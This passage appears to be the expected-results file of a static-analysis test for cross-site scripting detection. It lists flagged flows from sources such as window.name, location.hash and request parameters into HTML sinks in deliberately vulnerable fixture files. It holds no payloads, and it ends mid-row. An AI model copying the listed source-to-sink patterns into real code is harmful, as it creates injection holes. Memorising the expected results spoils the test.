angular2-client.ts:47:44:47:76 | routeSn ... ('foo') | angular2-client.ts:47:44:47:76 | routeSn ... ('foo') | angular2-client.ts:47:44:47:76 | routeSn ... ('foo') | Cross-site scripting vulnerability due to $@. | angular2-client.ts:47:44:47:76 | routeSn ... ('foo') | user-provided value | +| angular-tempate-url.js:9:26:9:45 | Cookie.get("unsafe") | angular-tempate-url.js:13:30:13:31 | ev | angular-tempate-url.js:9:26:9:45 | Cookie.get("unsafe") | Cross-site scripting vulnerability due to $@. | angular-tempate-url.js:13:30:13:31 | ev | user-provided value | +| classnames.js:7:31:7:84 | `` | classnames.js:7:58:7:68 | window.name | classnames.js:7:31:7:84 | `` | Cross-site scripting vulnerability due to $@. | classnames.js:7:58:7:68 | window.name | user-provided value | +| classnames.js:8:31:8:85 | `` | classnames.js:8:59:8:69 | window.name | classnames.js:8:31:8:85 | `` | Cross-site scripting vulnerability due to $@. | classnames.js:8:59:8:69 | window.name | user-provided value | +| classnames.js:9:31:9:85 | `` | classnames.js:9:59:9:69 | window.name | classnames.js:9:31:9:85 | `` | Cross-site scripting vulnerability due to $@. | classnames.js:9:59:9:69 | window.name | user-provided value | +| classnames.js:11:31:11:79 | `` | classnames.js:10:45:10:55 | window.name | classnames.js:11:31:11:79 | `` | Cross-site scripting vulnerability due to $@. | classnames.js:10:45:10:55 | window.name | user-provided value | +| classnames.js:13:31:13:83 | `` | classnames.js:13:57:13:67 | window.name | classnames.js:13:31:13:83 | `` | Cross-site scripting vulnerability due to $@. | classnames.js:13:57:13:67 | window.name | user-provided value | +| classnames.js:15:31:15:78 | `` | classnames.js:15:52:15:62 | window.name | classnames.js:15:31:15:78 | `` | Cross-site scripting vulnerability due to $@. | classnames.js:15:52:15:62 | window.name | user-provided value | +| classnames.js:17:32:17:79 | `` | classnames.js:17:53:17:63 | window.name | classnames.js:17:32:17:79 | `` | Cross-site scripting vulnerability due to $@. | classnames.js:17:53:17:63 | window.name | user-provided value | +| clipboard.ts:15:25:15:28 | html | clipboard.ts:8:18:8:51 | clipboa ... /html') | clipboard.ts:15:25:15:28 | html | Cross-site scripting vulnerability due to $@. | clipboard.ts:8:18:8:51 | clipboa ... /html') | user-provided value | +| clipboard.ts:24:23:24:58 | e.clipb ... /html') | clipboard.ts:24:23:24:58 | e.clipb ... /html') | clipboard.ts:24:23:24:58 | e.clipb ... /html') | Cross-site scripting vulnerability due to $@. | clipboard.ts:24:23:24:58 | e.clipb ... /html') | user-provided value | +| clipboard.ts:29:19:29:54 | e.clipb ... /html') | clipboard.ts:29:19:29:54 | e.clipb ... /html') | clipboard.ts:29:19:29:54 | e.clipb ... /html') | Cross-site scripting vulnerability due to $@. | clipboard.ts:29:19:29:54 | e.clipb ... /html') | user-provided value | +| clipboard.ts:33:19:33:68 | e.origi ... /html') | clipboard.ts:33:19:33:68 | e.origi ... /html') | clipboard.ts:33:19:33:68 | e.origi ... /html') | Cross-site scripting vulnerability due to $@. | clipboard.ts:33:19:33:68 | e.origi ... /html') | user-provided value | +| clipboard.ts:50:29:50:32 | html | clipboard.ts:43:22:43:55 | clipboa ... /html') | clipboard.ts:50:29:50:32 | html | Cross-site scripting vulnerability due to $@. | clipboard.ts:43:22:43:55 | clipboa ... /html') | user-provided value | +| clipboard.ts:73:29:73:39 | droppedHtml | clipboard.ts:71:27:71:62 | e.clipb ... /html') | clipboard.ts:73:29:73:39 | droppedHtml | Cross-site scripting vulnerability due to $@. | clipboard.ts:71:27:71:62 | e.clipb ... /html') | user-provided value | +| clipboard.ts:99:23:99:26 | html | clipboard.ts:98:22:98:54 | dataTra ... /html') | clipboard.ts:99:23:99:26 | html | Cross-site scripting vulnerability due to $@. | clipboard.ts:98:22:98:54 | dataTra ... /html') | user-provided value | +| custom-element.js:5:26:5:36 | window.name | custom-element.js:5:26:5:36 | window.name | custom-element.js:5:26:5:36 | window.name | Cross-site scripting vulnerability due to $@. | custom-element.js:5:26:5:36 | window.name | user-provided value | +| d3.js:11:15:11:24 | getTaint() | d3.js:4:12:4:22 | window.name | d3.js:11:15:11:24 | getTaint() | Cross-site scripting vulnerability due to $@. | d3.js:4:12:4:22 | window.name | user-provided value | +| d3.js:12:20:12:29 | getTaint() | d3.js:4:12:4:22 | window.name | d3.js:12:20:12:29 | getTaint() | Cross-site scripting vulnerability due to $@. | d3.js:4:12:4:22 | window.name | user-provided value | +| d3.js:14:20:14:29 | getTaint() | d3.js:4:12:4:22 | window.name | d3.js:14:20:14:29 | getTaint() | Cross-site scripting vulnerability due to $@. | d3.js:4:12:4:22 | window.name | user-provided value | +| d3.js:21:15:21:24 | getTaint() | d3.js:4:12:4:22 | window.name | d3.js:21:15:21:24 | getTaint() | Cross-site scripting vulnerability due to $@. | d3.js:4:12:4:22 | window.name | user-provided value | +| dates.js:11:31:11:70 | `Time i ... aint)}` | dates.js:9:36:9:55 | window.location.hash | dates.js:11:31:11:70 | `Time i ... aint)}` | Cross-site scripting vulnerability due to $@. | dates.js:9:36:9:55 | window.location.hash | user-provided value | +| dates.js:12:31:12:73 | `Time i ... aint)}` | dates.js:9:36:9:55 | window.location.hash | dates.js:12:31:12:73 | `Time i ... aint)}` | Cross-site scripting vulnerability due to $@. | dates.js:9:36:9:55 | window.location.hash | user-provided value | +| dates.js:13:31:13:72 | `Time i ... time)}` | dates.js:9:36:9:55 | window.location.hash | dates.js:13:31:13:72 | `Time i ... time)}` | Cross-site scripting vulnerability due to $@. | dates.js:9:36:9:55 | window.location.hash | user-provided value | +| dates.js:16:31:16:69 | `Time i ... aint)}` | dates.js:9:36:9:55 | window.location.hash | dates.js:16:31:16:69 | `Time i ... aint)}` | Cross-site scripting vulnerability due to $@. | dates.js:9:36:9:55 | window.location.hash | user-provided value | +| dates.js:18:31:18:66 | `Time i ... aint)}` | dates.js:9:36:9:55 | window.location.hash | dates.js:18:31:18:66 | `Time i ... aint)}` | Cross-site scripting vulnerability due to $@. | dates.js:9:36:9:55 | window.location.hash | user-provided value | +| dates.js:21:31:21:68 | `Time i ... aint)}` | dates.js:9:36:9:55 | window.location.hash | dates.js:21:31:21:68 | `Time i ... aint)}` | Cross-site scripting vulnerability due to $@. | dates.js:9:36:9:55 | window.location.hash | user-provided value | +| dates.js:37:31:37:84 | `Time i ... aint)}` | dates.js:30:36:30:55 | window.location.hash | dates.js:37:31:37:84 | `Time i ... aint)}` | Cross-site scripting vulnerability due to $@. | dates.js:30:36:30:55 | window.location.hash | user-provided value | +| dates.js:38:31:38:84 | `Time i ... aint)}` | dates.js:30:36:30:55 | window.location.hash | dates.js:38:31:38:84 | `Time i ... aint)}` | Cross-site scripting vulnerability due to $@. | dates.js:30:36:30:55 | window.location.hash | user-provided value | +| dates.js:39:31:39:86 | `Time i ... aint)}` | dates.js:30:36:30:55 | window.location.hash | dates.js:39:31:39:86 | `Time i ... aint)}` | Cross-site scripting vulnerability due to $@. | dates.js:30:36:30:55 | window.location.hash | user-provided value | +| dates.js:40:31:40:84 | `Time i ... aint)}` | dates.js:30:36:30:55 | window.location.hash | dates.js:40:31:40:84 | `Time i ... aint)}` | Cross-site scripting vulnerability due to $@. | dates.js:30:36:30:55 | window.location.hash | user-provided value | +| dates.js:48:31:48:90 | `Time i ... aint)}` | dates.js:46:36:46:55 | window.location.hash | dates.js:48:31:48:90 | `Time i ... aint)}` | Cross-site scripting vulnerability due to $@. | dates.js:46:36:46:55 | window.location.hash | user-provided value | +| dates.js:49:31:49:89 | `Time i ... aint)}` | dates.js:46:36:46:55 | window.location.hash | dates.js:49:31:49:89 | `Time i ... aint)}` | Cross-site scripting vulnerability due to $@. | dates.js:46:36:46:55 | window.location.hash | user-provided value | +| dates.js:50:31:50:104 | `Time i ... aint)}` | dates.js:46:36:46:55 | window.location.hash | dates.js:50:31:50:104 | `Time i ... aint)}` | Cross-site scripting vulnerability due to $@. | dates.js:46:36:46:55 | window.location.hash | user-provided value | +| dates.js:57:31:57:101 | `Time i ... aint)}` | dates.js:54:36:54:55 | window.location.hash | dates.js:57:31:57:101 | `Time i ... aint)}` | Cross-site scripting vulnerability due to $@. | dates.js:54:36:54:55 | window.location.hash | user-provided value | +| dates.js:59:31:59:87 | `Time i ... aint)}` | dates.js:54:36:54:55 | window.location.hash | dates.js:59:31:59:87 | `Time i ... aint)}` | Cross-site scripting vulnerability due to $@. | dates.js:54:36:54:55 | window.location.hash | user-provided value | +| dates.js:61:31:61:88 | `Time i ... aint)}` | dates.js:54:36:54:55 | window.location.hash | dates.js:61:31:61:88 | `Time i ... aint)}` | Cross-site scripting vulnerability due to $@. | dates.js:54:36:54:55 | window.location.hash | user-provided value | +| dragAndDrop.ts:15:25:15:28 | html | dragAndDrop.ts:8:18:8:50 | dataTra ... /html') | dragAndDrop.ts:15:25:15:28 | html | Cross-site scripting vulnerability due to $@. | dragAndDrop.ts:8:18:8:50 | dataTra ... /html') | user-provided value | +| dragAndDrop.ts:24:23:24:57 | e.dataT ... /html') | dragAndDrop.ts:24:23:24:57 | e.dataT ... /html') | dragAndDrop.ts:24:23:24:57 | e.dataT ... /html') | Cross-site scripting vulnerability due to $@. | dragAndDrop.ts:24:23:24:57 | e.dataT ... /html') | user-provided value | +| dragAndDrop.ts:29:19:29:53 | e.dataT ... /html') | dragAndDrop.ts:29:19:29:53 | e.dataT ... /html') | dragAndDrop.ts:29:19:29:53 | e.dataT ... /html') | Cross-site scripting vulnerability due to $@. | dragAndDrop.ts:29:19:29:53 | e.dataT ... /html') | user-provided value | +| dragAndDrop.ts:33:19:33:67 | e.origi ... /html') | dragAndDrop.ts:33:19:33:67 | e.origi ... /html') | dragAndDrop.ts:33:19:33:67 | e.origi ... /html') | Cross-site scripting vulnerability due to $@. | dragAndDrop.ts:33:19:33:67 | e.origi ... /html') | user-provided value | +| dragAndDrop.ts:50:29:50:32 | html | dragAndDrop.ts:43:22:43:54 | dataTra ... /html') | dragAndDrop.ts:50:29:50:32 | html | Cross-site scripting vulnerability due to $@. | dragAndDrop.ts:43:22:43:54 | dataTra ... /html') | user-provided value | +| dragAndDrop.ts:73:29:73:39 | droppedHtml | dragAndDrop.ts:71:27:71:61 | e.dataT ... /html') | dragAndDrop.ts:73:29:73:39 | droppedHtml | Cross-site scripting vulnerability due to $@. | dragAndDrop.ts:71:27:71:61 | e.dataT ... /html') | user-provided value | +| event-handler-receiver.js:2:31:2:83 | '

    ' | event-handler-receiver.js:2:49:2:61 | location.href | event-handler-receiver.js:2:31:2:83 | '

    ' | Cross-site scripting vulnerability due to $@. | event-handler-receiver.js:2:49:2:61 | location.href | user-provided value | +| express.js:6:15:6:33 | req.param("wobble") | express.js:6:15:6:33 | req.param("wobble") | express.js:6:15:6:33 | req.param("wobble") | Cross-site scripting vulnerability due to $@. | express.js:6:15:6:33 | req.param("wobble") | user-provided value | +| jquery.js:7:5:7:34 | "
    " | jquery.js:2:17:2:40 | documen ... .search | jquery.js:7:5:7:34 | "
    " | Cross-site scripting vulnerability due to $@. | jquery.js:2:17:2:40 | documen ... .search | user-provided value | +| jquery.js:8:18:8:34 | "XSS: " + tainted | jquery.js:2:17:2:40 | documen ... .search | jquery.js:8:18:8:34 | "XSS: " + tainted | Cross-site scripting vulnerability due to $@. | jquery.js:2:17:2:40 | documen ... .search | user-provided value | +| jquery.js:10:5:10:40 | "" + ... "" | jquery.js:10:13:10:20 | location | jquery.js:10:5:10:40 | "" + ... "" | Cross-site scripting vulnerability due to $@. | jquery.js:10:13:10:20 | location | user-provided value | +| jquery.js:14:19:14:58 | decodeU ... n.hash) | jquery.js:14:38:14:57 | window.location.hash | jquery.js:14:19:14:58 | decodeU ... n.hash) | Cross-site scripting vulnerability due to $@. | jquery.js:14:38:14:57 | window.location.hash | user-provided value | +| jquery.js:15:19:15:60 | decodeU ... search) | jquery.js:15:38:15:59 | window. ... .search | jquery.js:15:19:15:60 | decodeU ... search) | Cross-site scripting vulnerability due to $@. | jquery.js:15:38:15:59 | window. ... .search | user-provided value | +| jquery.js:16:19:16:64 | decodeU ... ring()) | jquery.js:16:38:16:52 | window.location | jquery.js:16:19:16:64 | decodeU ... ring()) | Cross-site scripting vulnerability due to $@. | jquery.js:16:38:16:52 | window.location | user-provided value | +| jquery.js:21:5:21:21 | hash.substring(1) | jquery.js:18:14:18:33 | window.location.hash | jquery.js:21:5:21:21 | hash.substring(1) | Cross-site scripting vulnerability due to $@. | jquery.js:18:14:18:33 | window.location.hash | user-provided value | +| jquery.js:22:5:22:25 | hash.su ... (1, 10) | jquery.js:18:14:18:33 | window.location.hash | jquery.js:22:5:22:25 | hash.su ... (1, 10) | Cross-site scripting vulnerability due to $@. | jquery.js:18:14:18:33 | window.location.hash | user-provided value | +| jquery.js:23:5:23:18 | hash.substr(1) | jquery.js:18:14:18:33 | window.location.hash | jquery.js:23:5:23:18 | hash.substr(1) | Cross-site scripting vulnerability due to $@. | jquery.js:18:14:18:33 | window.location.hash | user-provided value | +| jquery.js:24:5:24:17 | hash.slice(1) | jquery.js:18:14:18:33 | window.location.hash | jquery.js:24:5:24:17 | hash.slice(1) | Cross-site scripting vulnerability due to $@. | jquery.js:18:14:18:33 | window.location.hash | user-provided value | +| jquery.js:27:5:27:25 | hash.re ... #', '') | jquery.js:18:14:18:33 | window.location.hash | jquery.js:27:5:27:25 | hash.re ... #', '') | Cross-site scripting vulnerability due to $@. | jquery.js:18:14:18:33 | window.location.hash | user-provided value | +| jquery.js:28:5:28:43 | window. ... ?', '') | jquery.js:28:5:28:26 | window. ... .search | jquery.js:28:5:28:43 | window. ... ?', '') | Cross-site scripting vulnerability due to $@. | jquery.js:28:5:28:26 | window. ... .search | user-provided value | +| jquery.js:34:5:34:25 | '' + ... '' | jquery.js:18:14:18:33 | window.location.hash | jquery.js:34:5:34:25 | '' + ... '' | Cross-site scripting vulnerability due to $@. | jquery.js:18:14:18:33 | window.location.hash | user-provided value | +| jquery.js:36:25:36:31 | tainted | jquery.js:2:17:2:40 | documen ... .search | jquery.js:36:25:36:31 | tainted | Cross-site scripting vulnerability due to $@. | jquery.js:2:17:2:40 | documen ... .search | user-provided value | +| jquery.js:37:25:37:37 | () => tainted | jquery.js:2:17:2:40 | documen ... .search | jquery.js:37:25:37:37 | () => tainted | Cross-site scripting vulnerability due to $@. | jquery.js:2:17:2:40 | documen ... .search | user-provided value | +| json-stringify.jsx:31:40:31:61 | JSON.st ... locale) | json-stringify.jsx:5:18:5:36 | req.param("locale") | json-stringify.jsx:31:40:31:61 | JSON.st ... locale) | Cross-site scripting vulnerability due to $@. | json-stringify.jsx:5:18:5:36 | req.param("locale") | user-provided value | +| json-stringify.jsx:35:40:35:61 | JSON.st ... jsonLD) | json-stringify.jsx:5:18:5:36 | req.param("locale") | json-stringify.jsx:35:40:35:61 | JSON.st ... jsonLD) | Cross-site scripting vulnerability due to $@. | json-stringify.jsx:5:18:5:36 | req.param("locale") | user-provided value | +| jwt-server.js:10:19:10:29 | decoded.foo | jwt-server.js:7:17:7:35 | req.param("wobble") | jwt-server.js:10:19:10:29 | decoded.foo | Cross-site scripting vulnerability due to $@. | jwt-server.js:7:17:7:35 | req.param("wobble") | user-provided value | +| nodemailer.js:13:11:13:69 | `Hi, yo ... sage}.` | nodemailer.js:13:50:13:66 | req.query.message | nodemailer.js:13:11:13:69 | `Hi, yo ... sage}.` | HTML injection vulnerability due to $@. | nodemailer.js:13:50:13:66 | req.query.message | user-provided value | +| optionalSanitizer.js:6:18:6:23 | target | optionalSanitizer.js:2:16:2:39 | documen ... .search | optionalSanitizer.js:6:18:6:23 | target | Cross-site scripting vulnerability due to $@. | optionalSanitizer.js:2:16:2:39 | documen ... .search | user-provided value | +| optionalSanitizer.js:9:18:9:24 | tainted | optionalSanitizer.js:2:16:2:39 | documen ... .search | optionalSanitizer.js:9:18:9:24 | tainted | Cross-site scripting vulnerability due to $@. | optionalSanitizer.js:2:16:2:39 | documen ... .search | user-provided value | +| optionalSanitizer.js:17:20:17:20 | x | optionalSanitizer.js:2:16:2:39 | documen ... .search | optionalSanitizer.js:17:20:17:20 | x | Cross-site scripting vulnerability due to $@. | optionalSanitizer.js:2:16:2:39 | documen ... .search | user-provided value | +| optionalSanitizer.js:32:18:32:25 | tainted2 | optionalSanitizer.js:26:16:26:39 | documen ... .search | optionalSanitizer.js:32:18:32:25 | tainted2 | Cross-site scripting vulnerability due to $@. | optionalSanitizer.js:26:16:26:39 | documen ... .search | user-provided value | +| optionalSanitizer.js:36:18:36:25 | tainted2 | optionalSanitizer.js:26:16:26:39 | documen ... .search | optionalSanitizer.js:36:18:36:25 | tainted2 | Cross-site scripting vulnerability due to $@. | optionalSanitizer.js:26:16:26:39 | documen ... .search | user-provided value | +| optionalSanitizer.js:39:18:39:25 | tainted3 | optionalSanitizer.js:26:16:26:39 | documen ... .search | optionalSanitizer.js:39:18:39:25 | tainted3 | Cross-site scripting vulnerability due to $@. | optionalSanitizer.js:26:16:26:39 | documen ... .search | user-provided value | +| optionalSanitizer.js:43:18:43:25 | tainted3 | optionalSanitizer.js:26:16:26:39 | documen ... .search | optionalSanitizer.js:43:18:43:25 | tainted3 | Cross-site scripting vulnerability due to $@. | optionalSanitizer.js:26:16:26:39 | documen ... .search | user-provided value | +| optionalSanitizer.js:45:18:45:56 | sanitiz ... target | optionalSanitizer.js:26:16:26:39 | documen ... .search | optionalSanitizer.js:45:18:45:56 | sanitiz ... target | Cross-site scripting vulnerability due to $@. | optionalSanitizer.js:26:16:26:39 | documen ... .search | user-provided value | +| pages/[id].jsx:10:44:10:45 | id | pages/[id].jsx:5:18:5:29 | router.query | pages/[id].jsx:10:44:10:45 | id | Cross-site scripting vulnerability due to $@. | pages/[id].jsx:5:18:5:29 | router.query | user-provided value | +| pages/[id].jsx:13:44:13:52 | params.id | pages/[id].jsx:25:11:25:24 | context.params | pages/[id].jsx:13:44:13:52 | params.id | Cross-site scripting vulnerability due to $@. | pages/[id].jsx:25:11:25:24 | context.params | user-provided value | +| pages/[id].jsx:16:44:16:51 | params.q | pages/[id].jsx:26:10:26:22 | context.query | pages/[id].jsx:16:44:16:51 | params.q | Cross-site scripting vulnerability due to $@. | pages/[id].jsx:26:10:26:22 | context.query | user-provided value | +| react-native.js:8:18:8:24 | tainted | react-native.js:7:17:7:33 | req.param("code") | react-native.js:8:18:8:24 | tainted | Cross-site scripting vulnerability due to $@. | react-native.js:7:17:7:33 | req.param("code") | user-provided value | +| react-native.js:9:27:9:33 | tainted | react-native.js:7:17:7:33 | req.param("code") | react-native.js:9:27:9:33 | tainted | Cross-site scripting vulnerability due to $@. | react-native.js:7:17:7:33 | req.param("code") | user-provided value | +| react-use-context.js:10:22:10:32 | window.name | react-use-context.js:10:22:10:32 | window.name | react-use-context.js:10:22:10:32 | window.name | Cross-site scripting vulnerability due to $@. | react-use-context.js:10:22:10:32 | window.name | user-provided value | +| react-use-context.js:16:26:16:36 | window.name | react-use-context.js:16:26:16:36 | window.name | react-use-context.js:16:26:16:36 | window.name | Cross-site scripting vulnerability due to $@. | react-use-context.js:16:26:16:36 | window.name | user-provided value | +| react-use-router.js:8:21:8:39 | router.query.foobar | react-use-router.js:8:21:8:32 | router.query | react-use-router.js:8:21:8:39 | router.query.foobar | Cross-site scripting vulnerability due to $@. | react-use-router.js:8:21:8:32 | router.query | user-provided value | +| react-use-router.js:11:24:11:42 | router.query.foobar | react-use-router.js:11:24:11:35 | router.query | react-use-router.js:11:24:11:42 | router.query.foobar | Cross-site scripting vulnerability due to $@. | react-use-router.js:11:24:11:35 | router.query | user-provided value | +| react-use-router.js:23:43:23:61 | router.query.foobar | react-use-router.js:23:43:23:54 | router.query | react-use-router.js:23:43:23:61 | router.query.foobar | Cross-site scripting vulnerability due to $@. | react-use-router.js:23:43:23:54 | router.query | user-provided value | +| react-use-router.js:33:21:33:39 | router.query.foobar | react-use-router.js:33:21:33:32 | router.query | react-use-router.js:33:21:33:39 | router.query.foobar | Cross-site scripting vulnerability due to $@. | react-use-router.js:33:21:33:32 | router.query | user-provided value | +| react-use-state.js:5:51:5:55 | state | react-use-state.js:4:38:4:48 | window.name | react-use-state.js:5:51:5:55 | state | Cross-site scripting vulnerability due to $@. | react-use-state.js:4:38:4:48 | window.name | user-provided value | +| react-use-state.js:11:51:11:55 | state | react-use-state.js:10:14:10:24 | window.name | react-use-state.js:11:51:11:55 | state | Cross-site scripting vulnerability due to $@. | react-use-state.js:10:14:10:24 | window.name | user-provided value | +| react-use-state.js:17:51:17:55 | state | react-use-state.js:16:20:16:30 | window.name | react-use-state.js:17:51:17:55 | state | Cross-site scripting vulnerability due to $@. | react-use-state.js:16:20:16:30 | window.name | user-provided value | +| react-use-state.js:23:35:23:38 | prev | react-use-state.js:25:20:25:30 | window.name | react-use-state.js:23:35:23:38 | prev | Cross-site scripting vulnerability due to $@. | react-use-state.js:25:20:25:30 | window.name | user-provided value | +| sanitiser.js:23:21:23:44 | '' + ... '' | sanitiser.js:16:17:16:27 | window.name | sanitiser.js:23:21:23:44 | '' + ... '' | Cross-site scripting vulnerability due to $@. | sanitiser.js:16:17:16:27 | window.name | user-provided value | +| sanitiser.js:30:21:30:44 | '' + ... '' | sanitiser.js:16:17:16:27 | window.name | sanitiser.js:30:21:30:44 | '' + ... '' | Cross-site scripting vulnerability due to $@. | sanitiser.js:16:17:16:27 | window.name | user-provided value | +| sanitiser.js:33:21:33:44 | '' + ... '' | sanitiser.js:16:17:16:27 | window.name | sanitiser.js:33:21:33:44 | '' + ... '' | Cross-site scripting vulnerability due to $@. | sanitiser.js:16:17:16:27 | window.name | user-provided value | +| sanitiser.js:38:21:38:44 | '' + ... '' | sanitiser.js:16:17:16:27 | window.name | sanitiser.js:38:21:38:44 | '' + ... '' | Cross-site scripting vulnerability due to $@. | sanitiser.js:16:17:16:27 | window.name | user-provided value | +| sanitiser.js:45:21:45:44 | '' + ... '' | sanitiser.js:16:17:16:27 | window.name | sanitiser.js:45:21:45:44 | '' + ... '' | Cross-site scripting vulnerability due to $@. | sanitiser.js:16:17:16:27 | window.name | user-provided value | +| sanitiser.js:48:19:48:46 | tainted ... /g, '') | sanitiser.js:16:17:16:27 | window.name | sanitiser.js:48:19:48:46 | tainted ... /g, '') | Cross-site scripting vulnerability due to $@. | sanitiser.js:16:17:16:27 | window.name | user-provided value | +| stored-xss.js:5:20:5:52 | session ... ssion') | stored-xss.js:2:39:2:62 | documen ... .search | stored-xss.js:5:20:5:52 | session ... ssion') | Cross-site scripting vulnerability due to $@. | stored-xss.js:2:39:2:62 | documen ... .search | user-provided value | +| stored-xss.js:8:20:8:48 | localSt ... local') | stored-xss.js:3:35:3:58 | documen ... .search | stored-xss.js:8:20:8:48 | localSt ... local') | Cross-site scripting vulnerability due to $@. | stored-xss.js:3:35:3:58 | documen ... .search | user-provided value | +| stored-xss.js:12:20:12:54 | "" | stored-xss.js:3:35:3:58 | documen ... .search | stored-xss.js:12:20:12:54 | "" | Cross-site scripting vulnerability due to $@. | stored-xss.js:3:35:3:58 | documen ... .search | user-provided value | +| string-manipulations.js:3:16:3:32 | document.location | string-manipulations.js:3:16:3:32 | document.location | string-manipulations.js:3:16:3:32 | document.location | Cross-site scripting vulnerability due to $@. | string-manipulations.js:3:16:3:32 | document.location | user-provided value | +| string-manipulations.js:4:16:4:37 | documen ... on.href | string-manipulations.js:4:16:4:37 | documen ... on.href | string-manipulations.js:4:16:4:37 | documen ... on.href | Cross-site scripting vulnerability due to $@. | string-manipulations.js:4:16:4:37 | documen ... on.href | user-provided value | +| string-manipulations.js:5:16:5:47 | documen ... lueOf() | string-manipulations.js:5:16:5:37 | documen ... on.href | string-manipulations.js:5:16:5:47 | documen ... lueOf() | Cross-site scripting vulnerability due to $@. | string-manipulations.js:5:16:5:37 | documen ... on.href | user-provided value | +| string-manipulations.js:6:16:6:43 | documen ... f.sup() | string-manipulations.js:6:16:6:37 | documen ... on.href | string-manipulations.js:6:16:6:43 | documen ... f.sup() | Cross-site scripting vulnerability due to $@. | string-manipulations.js:6:16:6:37 | documen ... on.href | user-provided value | +| string-manipulations.js:7:16:7:51 | documen ... rCase() | string-manipulations.js:7:16:7:37 | documen ... on.href | string-manipulations.js:7:16:7:51 | documen ... rCase() | Cross-site scripting vulnerability due to $@. | string-manipulations.js:7:16:7:37 | documen ... on.href | user-provided value | +| string-manipulations.js:8:16:8:48 | documen ... mLeft() | string-manipulations.js:8:16:8:37 | documen ... on.href | string-manipulations.js:8:16:8:48 | documen ... mLeft() | Cross-site scripting vulnerability due to $@. | string-manipulations.js:8:16:8:37 | documen ... on.href | user-provided value | +| string-manipulations.js:9:16:9:58 | String. ... n.href) | string-manipulations.js:9:36:9:57 | documen ... on.href | string-manipulations.js:9:16:9:58 | String. ... n.href) | Cross-site scripting vulnerability due to $@. | string-manipulations.js:9:36:9:57 | documen ... on.href | user-provided value | +| string-manipulations.js:10:16:10:45 | String( ... n.href) | string-manipulations.js:10:23:10:44 | documen ... on.href | string-manipulations.js:10:16:10:45 | String( ... n.href) | Cross-site scripting vulnerability due to $@. | string-manipulations.js:10:23:10:44 | documen ... on.href | user-provided value | +| tainted-url-suffix-arguments.js:6:22:6:22 | y | tainted-url-suffix-arguments.js:11:17:11:36 | window.location.href | tainted-url-suffix-arguments.js:6:22:6:22 | y | Cross-site scripting vulnerability due to $@. | tainted-url-suffix-arguments.js:11:17:11:36 | window.location.href | user-provided value | +| tooltip.jsx:10:25:10:30 | source | tooltip.jsx:6:20:6:30 | window.name | tooltip.jsx:10:25:10:30 | source | Cross-site scripting vulnerability due to $@. | tooltip.jsx:6:20:6:30 | window.name | user-provided value | +| tooltip.jsx:11:25:11:30 | source | tooltip.jsx:6:20:6:30 | window.name | tooltip.jsx:11:25:11:30 | source | Cross-site scripting vulnerability due to $@. | tooltip.jsx:6:20:6:30 | window.name | user-provided value | +| tooltip.jsx:18:51:18:59 | provide() | tooltip.jsx:22:20:22:30 | window.name | tooltip.jsx:18:51:18:59 | provide() | Cross-site scripting vulnerability due to $@. | tooltip.jsx:22:20:22:30 | window.name | user-provided value | +| translate.js:8:27:8:50 | searchP ... 'term') | translate.js:6:16:6:39 | documen ... .search | translate.js:8:27:8:50 | searchP ... 'term') | Cross-site scripting vulnerability due to $@. | translate.js:6:16:6:39 | documen ... .search | user-provided value | +| trusted-types-lib.js:2:12:2:12 | x | trusted-types.js:13:20:13:30 | window.name | trusted-types-lib.js:2:12:2:12 | x | Cross-site scripting vulnerability due to $@. | trusted-types.js:13:20:13:30 | window.name | user-provided value | +| trusted-types.js:3:67:3:67 | x | trusted-types.js:4:20:4:30 | window.name | trusted-types.js:3:67:3:67 | x | Cross-site scripting vulnerability due to $@. | trusted-types.js:4:20:4:30 | window.name | user-provided value | +| tst3.js:4:25:4:32 | data.src | tst3.js:2:42:2:63 | window. ... .search | tst3.js:4:25:4:32 | data.src | Cross-site scripting vulnerability due to $@. | tst3.js:2:42:2:63 | window. ... .search | user-provided value | +| tst3.js:5:26:5:31 | data.p | tst3.js:2:42:2:63 | window. ... .search | tst3.js:5:26:5:31 | data.p | Cross-site scripting vulnerability due to $@. | tst3.js:2:42:2:63 | window. ... .search | user-provided value | +| tst3.js:7:32:7:37 | data.p | tst3.js:2:42:2:63 | window. ... .search | tst3.js:7:32:7:37 | data.p | Cross-site scripting vulnerability due to $@. | tst3.js:2:42:2:63 | window. ... .search | user-provided value | +| tst3.js:9:37:9:42 | data.p | tst3.js:2:42:2:63 | window. ... .search | tst3.js:9:37:9:42 | data.p | Cross-site scripting vulnerability due to $@. | tst3.js:2:42:2:63 | window. ... .search | user-provided value | +| tst3.js:10:38:10:43 | data.p | tst3.js:2:42:2:63 | window. ... .search | tst3.js:10:38:10:43 | data.p | Cross-site scripting vulnerability due to $@. | tst3.js:2:42:2:63 | window. ... .search | user-provided value | +| tst.js:4:18:4:23 | target | tst.js:2:16:2:39 | documen ... .search | tst.js:4:18:4:23 | target | Cross-site scripting vulnerability due to $@. | tst.js:2:16:2:39 | documen ... .search | user-provided value | +| tst.js:6:18:6:126 | "" | tst.js:6:37:6:58 | documen ... on.href | tst.js:6:18:6:126 | "" | Cross-site scripting vulnerability due to $@. | tst.js:6:37:6:58 | documen ... on.href | user-provided value | +| tst.js:9:5:9:42 | '
    ' | tst.js:2:16:2:39 | documen ... .search | tst.js:9:5:9:42 | '
    ' | Cross-site scripting vulnerability due to $@. | tst.js:2:16:2:39 | documen ... .search | user-provided value | +| tst.js:15:18:15:35 | params.get('name') | tst.js:14:25:14:41 | document.location | tst.js:15:18:15:35 | params.get('name') | Cross-site scripting vulnerability due to $@. | tst.js:14:25:14:41 | document.location | user-provided value | +| tst.js:18:18:18:41 | searchP ... 'name') | tst.js:2:16:2:39 | documen ... .search | tst.js:18:18:18:41 | searchP ... 'name') | Cross-site scripting vulnerability due to $@. | tst.js:2:16:2:39 | documen ... .search | user-provided value | +| tst.js:22:18:22:23 | target | tst.js:24:5:24:28 | documen ... .search | tst.js:22:18:22:23 | target | Cross-site scripting vulnerability due to $@. | tst.js:24:5:24:28 | documen ... .search | user-provided value | +| tst.js:29:16:29:20 | bar() | tst.js:27:10:27:33 | documen ... .search | tst.js:29:16:29:20 | bar() | Cross-site scripting vulnerability due to $@. | tst.js:27:10:27:33 | documen ... .search | user-provided value | +| tst.js:34:16:34:44 | baz(doc ... search) | tst.js:34:20:34:43 | documen ... .search | tst.js:34:16:34:44 | baz(doc ... search) | Cross-site scripting vulnerability due to $@. | tst.js:34:20:34:43 | documen ... .search | user-provided value | +| tst.js:39:16:39:45 | wrap(do ... search) | tst.js:39:21:39:44 | documen ... .search | tst.js:39:16:39:45 | wrap(do ... search) | Cross-site scripting vulnerability due to $@. | tst.js:39:21:39:44 | documen ... .search | user-provided value | +| tst.js:46:16:46:45 | 